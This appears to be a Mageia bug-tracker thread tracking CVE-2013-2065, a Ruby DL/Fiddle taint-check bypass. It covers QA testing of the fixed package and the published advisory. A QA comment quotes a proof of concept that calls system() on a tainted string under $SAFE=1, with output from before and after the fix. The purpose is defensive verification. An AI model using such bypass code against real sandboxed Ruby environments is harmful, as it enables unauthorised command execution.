Slackware has issued an advisory on May 16: http://lwn.net/Alerts/551054/ Mageia 2 is not affected (ruby 1.8 not affected). The issue is fixed in 1.9.3 p426: http://www.ruby-lang.org/en/news/2013/05/14/taint-bypass-dl-fiddle-cve-2013-2065/ Reproducible: Steps to Reproduce:
Whiteboard: (none) => MGA3TOO
Wait until mga3 released. I'll likely propose ruby 2.0 for mga4.
Status: NEW => ASSIGNEDVersion: Cauldron => 3
Whiteboard: MGA3TOO => MGA2TOO
Whiteboard: MGA2TOO => (none)
Please test ruby-1.9.3.p429-1.mga3
Assignee: fundawang => qa-bugsSource RPM: ruby-1.9.3.p392-1.mga3.src.rpm => ruby-1.9.3.p429-1.mga3
Funda could you remember to add info for QA please. SRPM: ruby-1.9.3.p429-1.mga3.src.rpm ------------------------------------ lib(64)ruby1.9 ruby-doc ruby-irb ruby ruby-tk ruby-devel Testing complete mga3 64 PoC for CVE-2013-2065: http://www.ruby-lang.org/en/news/2013/05/14/taint-bypass-dl-fiddle-cve-2013-2065 Before ------ Needs requires adding to the scripts, so.. require 'dl' require 'dl/import' def my_function(user_input) handle = DL.dlopen(nil) sys_cfunc = DL::CFunc.new(handle['system'], DL::TYPE_INT, 'system') sys = DL::Function.new(sys_cfunc, [DL::TYPE_VOIDP]) sys.call user_input end $SAFE = 1 my_function "uname -rs".taint When run in irb it outputs.. irb(main):011:0> my_function "uname -rs".taint Linux 3.8.13-desktop-1.mga3 => 0 Also, for fiddle, adding require 'fiddle'.. require 'fiddle' def my_function(user_input) handle = DL.dlopen(nil) sys = Fiddle::Function.new(handle['system'], [Fiddle::TYPE_VOIDP], Fiddle::TYPE_INT) sys.call user_input end $SAFE = 1 my_function "uname -rs".taint Outputs.. irb(main):010:0> my_function "uname -rs".taint Linux 3.8.13-desktop-1.mga3 => 0 After ----- Using the same scripts in irb irb(main):011:0> my_function "uname -rs".taint SecurityError: tainted parameter not allowed from /usr/share/ruby/dl/func.rb:92:in `call' from /usr/share/ruby/dl/func.rb:92:in `call' from (irb):7:in `my_function' from (irb):11 from /usr/bin/irb:12:in `<main>' And.. irb(main):010:0> my_function "uname -rs".taint SecurityError: tainted parameter not allowed from (irb):6:in `call' from (irb):6:in `my_function' from (irb):10 from /usr/bin/irb:12:in `<main>' So CVE is confirmed and is now closed.
Whiteboard: (none) => has_procedure mga3-64-OK
Testing complete mga3 32 Validating SRPM: ruby-1.9.3.p429-1.mga3.src.rpm Advisory TBC Could sysadmin please push from 3 core/updates_testing to core/updates when the advisory has been added. Thanks!
Keywords: (none) => validated_updateWhiteboard: has_procedure mga3-64-OK => has_procedure mga3-64-OK mga3-32-okCC: (none) => fundawang, sysadmin-bugs
Advisory: ======================== Updated ruby packages fix security vulnerability: Vulnerability in DL and Fiddle in Ruby before 1.9.3p429 where tainted strings can be used by system calls regardless of the $SAFE level set in Ruby. Native functions exposed to Ruby with DL or Fiddle do not check the taint values set on the objects passed in. This can result in tainted objects being accepted as input when a SecurityError exception should be raised (CVE-2013-2065). References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2065 http://www.ruby-lang.org/en/news/2013/05/14/taint-bypass-dl-fiddle-cve-2013-2065/
Update pushed: https://wiki.mageia.org/en/Support/Advisories/MGASA-2013-0155
Status: ASSIGNED => RESOLVEDCC: (none) => tmbResolution: (none) => FIXED